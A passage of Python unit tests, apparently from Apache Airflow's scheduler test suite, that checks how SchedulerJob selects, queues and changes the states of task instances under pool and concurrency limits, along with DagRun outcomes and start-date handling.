ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
@mock_conf_get('core', 'non_pooled_task_slot_count', 1)
def test_find_executable_task_instances_in_non_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_in_non_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
t1 = DummyOperator(dag=dag, task_id='dummy1')
t2 = DummyOperator(dag=dag, task_id='dummy2')
dagbag = self._make_simple_dag_bag([dag])
executor = TestExecutor(do_update=True)
scheduler = SchedulerJob(executor=executor)
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
session = settings.Session()
ti1 = TI(task=t1, execution_date=dr1.execution_date)
ti2 = TI(task=t2, execution_date=dr2.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
# Two tasks w/o pool up for execution and our non_pool size is 1
res = scheduler._find_executable_task_instances(
dagbag,
states=(State.SCHEDULED,),
session=session)
self.assertEqual(1, len(res))
ti2.state = State.RUNNING
ti2.pool = Pool.default_pool_name
session.merge(ti2)
session.commit()
# One task w/o pool up for execution and one task task running
res = scheduler._find_executable_task_instances(
dagbag,
states=(State.SCHEDULED,),
session=session)
self.assertEqual(0, len(res))
session.close()
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
executor = TestExecutor(do_update=True)
scheduler = SchedulerJob(executor=executor)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_1.state = State.QUEUED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SUCCESS
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
executor.queued_tasks[ti1_1.key] = ti1_1
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED, State.QUEUED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
assert mock_queue_command.called
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEqual(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor(do_update=False)
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0)
executor = TestExecutor(do_update=False)
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
[State.UP_FOR_RETRY, State.FAILED],
[State.QUEUED, State.NONE],
[State.SCHEDULED, State.NONE],
[State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
self, initial_task_state, expected_task_state):
session = settings.Session()
dag = DAG(
'test_execute_helper_should_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
# Create DAG run with FAILED state
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.FAILED,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = initial_task_state
session.commit()
# Create scheduler and mock calls to processor. Run duration is set
# to a high value to ensure loop is entered. Poll interval is 0 to
# avoid sleep. Done flag is set to true to exist the loop immediately.
scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
executor = TestExecutor(do_update=False)
executor.queued_tasks
scheduler.executor = executor
processor = mock.MagicMock()
processor.harvest_simple_dags.return_value = [dag]
processor.done = True
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
for tid, state in expected_task_states.items():
if state != State.FAILED:
continue
self.null_exec.mock_task_fail(dag_id, tid, ex_date)
try:
dag.run(start_date=ex_date, end_date=ex_date, executor=self.null_exec, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# TODO: this should live in test_dagrun.py
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dr = scheduler.create_dag_run(dag)
self.null_exec.mock_task_fail(dag_id, 'test_dagrun_fail', DEFAULT_DATE)
with self.assertRaises(AirflowException):
dag.run(start_date=dr.execution_date, end_date=dr.execution_date, executor=self.null_exec)
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_root_after_dagrun_unfinished(self):
"""
DagRuns with one successful and one future root task -> SUCCESS
Noted: the DagRun state could be still in running state during CI.
"""
dag_id = 'test_dagrun_states_root_future'
dag = self.dagbag.get_dag(dag_id)
scheduler = SchedulerJob(
dag_id,
num_runs=1,
executor=self.null_exec,
subdir=dag.fileloc)
scheduler.run()
first_run = DagRun.find(dag_id=dag_id, execution_date=DEFAULT_DATE)[0]
ti_ids = [(ti.task_id, ti.state) for ti in first_run.get_task_instances()]
self.assertEqual(ti_ids, [('current', State.SUCCESS)])
self.assertIn(first_run.state, [State.SUCCESS, State.RUNNING])
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
executor=self.null_exec,
subdir=dag.fileloc,
num_runs=1)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
self.assertListEqual([], self.null_exec.sorted_tasks)
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
bf_exec = TestExecutor()
backfill = BackfillJob(
executor=bf_exec,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
self.assertListEqual(
[
((dag.dag_id, 'dummy', DEFAULT_DATE, 1), State.SUCCESS),
],
bf_exec.sorted_tasks
)
session.commit()
scheduler = SchedulerJob(dag_id,
executor=self.null_exec,
subdir=dag.fileloc,
num_runs=1)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
self.assertListEqual([], self.null_exec.sorted_tasks)
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
executor=self.null_exec,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
executor=self.null_exec,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
@parameterized.expand([
[State.NONE, None, None],
[State.UP_FOR_RETRY, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
[State.UP_FOR_RESCHEDULE, timezone.utcnow() - datetime.timedelta(minutes=30),
timezone.utcnow() - datetime.timedelta(minutes=15)],
])
def test_scheduler_process_task_instances(self, state, start_date, end_date):
"""
Test if _process_task_instances puts the right task instances into the
mock_list.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
with create_session() as session:
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
